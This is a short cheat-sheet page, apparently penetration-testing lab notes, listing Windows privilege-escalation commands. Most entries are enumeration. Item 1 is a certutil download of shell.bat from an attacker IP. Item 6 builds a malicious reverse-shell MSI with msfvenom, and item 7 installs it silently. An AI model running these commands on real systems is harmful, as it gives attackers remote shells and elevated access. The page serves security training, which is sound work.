LinkedInGithub
Edit

Other Commands

  1. Transfer file with certutil

    certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat

  2. Encode file with certutil

    certutil -encode file1 encodedfile

  3. Decode file with certutil

    certutil -decode encodedfile file2

  4. Query for always install elevated registry key (1)

    reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

  5. Query for always install elevated registry key (2)

    reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

  6. Generate a malicious MSI package

    msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi

  7. Executing an MSI package from command line

    msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart

  8. Enumerate scheduled tasks

    schtasks /query /fo LIST /v

  9. Enumerate scheduled tasks with PowerShell

    Get-ScheduledTask | select TaskName,State

  10. Check permissions on a directory

    .\accesschk64.exe /accepteula -s -d C:\Scripts\

  11. Check local user description field

    Get-LocalUser

  12. Enumerate computer description field

    Get-WmiObject -Class Win32_OperatingSystem | select Description

  13. Mount VMDK on Linux

    guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmd

  14. Mount VHD/VHDX on Linux

    guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1

  15. Update Windows Exploit Suggester database

    sudo python2.7 windows-exploit-suggester.py --update

  16. Running Windows Exploit Suggester

    python2.7 windows-exploit-suggester.py --database 2021-05-13-mssb.xls --systeminfo win7lpe-systeminfo.txt
PreviousInitial EnumerationNextSearching for Passwords in Files

Last updated